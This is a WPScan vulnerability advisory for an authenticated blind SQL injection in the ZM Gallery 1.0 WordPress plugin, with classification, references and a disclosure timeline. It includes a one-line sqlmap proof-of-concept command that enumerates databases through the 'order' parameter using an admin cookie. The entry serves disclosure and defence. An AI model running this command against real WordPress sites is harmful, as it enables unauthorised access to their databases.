ZM Gallery 1.0 – Authenticated Blind SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: admin user.

$_GET[‘order’] is escaped wrong. Attack with Blind Injection
Proof of Concept
python sqlmap.py -u "http://www.example.com/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=mysql

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 127
Verified No
WPVDB ID 8703

Timeline

Publicly Published 2016-12-14 (9 months ago)
Added 2016-12-20 (9 months ago)
Last Updated 2016-12-20 (9 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.